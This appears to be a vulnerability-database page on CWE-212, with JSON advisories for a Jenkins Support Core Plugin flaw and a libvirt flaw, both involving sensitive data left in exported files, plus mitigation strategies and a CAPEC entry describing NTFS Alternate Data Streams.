"name": "org.jenkins-ci.plugins:support-core"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.79.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2022-25187"
],
"database_specific": {
"cwe_ids": [
"CWE-212",
"CWE-312",
"CWE-522"
],
"github_reviewed": true,
"github_reviewed_at": "2022-07-27T21:24:40Z",
"nvd_published_at": "2022-02-15T17:15:00Z",
"severity": "MODERATE"
},
"details": "Jenkins Support Core Plugin 2.79 and earlier does not redact some sensitive information in the support bundle. Support Core Plugin 2.79.1 adds a list of keywords whose associated values are redacted.",
"id": "GHSA-5m8f-v3gw-h94w",
"modified": "2023-10-27T16:52:02Z",
"published": "2022-02-16T00:01:28Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-25187"
},
{
"type": "WEB",
"url": "https://github.com/jenkinsci/support-core-plugin/commit/c6d20da4f372f03bd3e4844f0df2f109df68a63c"
},
{
"type": "WEB",
"url": "https://github.com/jenkinsci/support-core-plugin/commit/e90487a87bc0a3445c887203f5badec17af905c5"
},
{
"type": "PACKAGE",
"url": "https://github.com/jenkinsci/support-core-plugin"
},
{
"type": "WEB",
"url": "https://www.jenkins.io/security/advisory/2022-02-15/#SECURITY-2186"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Jenkins Support Core Plugin stores sensitive data in plain text"
}
GHSA-5QRF-45P7-8VRC
Vulnerability from github – Published: 2022-05-24 19:03 – Updated: 2022-05-24 19:03An information disclosure vulnerability was found in libvirt in versions before 6.3.0. HTTP cookies used to access network-based disks were saved in the XML dump of the guest domain. This flaw allows an attacker to access potentially sensitive information in the domain configuration via the dumpxml command.
{
"affected": [],
"aliases": [
"CVE-2020-14301"
],
"database_specific": {
"cwe_ids": [
"CWE-212"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-05-27T20:15:00Z",
"severity": "HIGH"
},
"details": "An information disclosure vulnerability was found in libvirt in versions before 6.3.0. HTTP cookies used to access network-based disks were saved in the XML dump of the guest domain. This flaw allows an attacker to access potentially sensitive information in the domain configuration via the `dumpxml` command.",
"id": "GHSA-5qrf-45p7-8vrc",
"modified": "2022-05-24T19:03:34Z",
"published": "2022-05-24T19:03:34Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-14301"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1848640"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20210629-0007"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
Mitigation
Clearly specify which information should be regarded as private or sensitive, and require that the product offers functionality that allows the user to cleanse the sensitive information from the resource before it is published or exported to other parties.
Mitigation MIT-46
Strategy: Separation of Privilege
- Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.
- Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges.
Mitigation MIT-57
Strategy: Attack Surface Reduction
- Some tools can automatically analyze documents to redact, strip, or "sanitize" private information, although some human review might be necessary. Tools may vary in terms of which document formats can be processed.
- When calling an external program to automatically generate or convert documents, invoke the program with any available options that avoid generating sensitive metadata. Some formats have well-defined fields that could contain private data, such as Exchangeable image file format (Exif), which can contain potentially sensitive metadata such as geolocation, date, and time [REF-1515] [REF-1516].
Mitigation MIT-33
Strategy: Attack Surface Reduction
Use naming conventions and strong types to make it easier to spot when sensitive data is being used. When creating structures, objects, or other complex entities, separate the sensitive and non-sensitive data as much as possible.
Mitigation
Avoid errors related to improper resource shutdown or release (CWE-404), which may leave the sensitive data within the resource if it is in an incomplete state.
CAPEC-168: Windows ::DATA Alternate Data Stream
An attacker exploits the functionality of Microsoft NTFS Alternate Data Streams (ADS) to undermine system security. ADS allows multiple "files" to be stored in one directory entry referenced as filename:streamname. One or more alternate data streams may be stored in any file or directory. Normal Microsoft utilities do not show the presence of an ADS stream attached to a file. The additional space for the ADS is not recorded in the displayed file size. The additional space for ADS is accounted for in the used space on the volume. An ADS can be any type of file. ADS are copied by standard Microsoft utilities between NTFS volumes. ADS can be used by an attacker or intruder to hide tools, scripts, and data from detection by normal system utilities. Many anti-virus programs do not check for or scan ADS. Windows Vista does have a switch (-R) on the command line DIR command that will display alternate streams.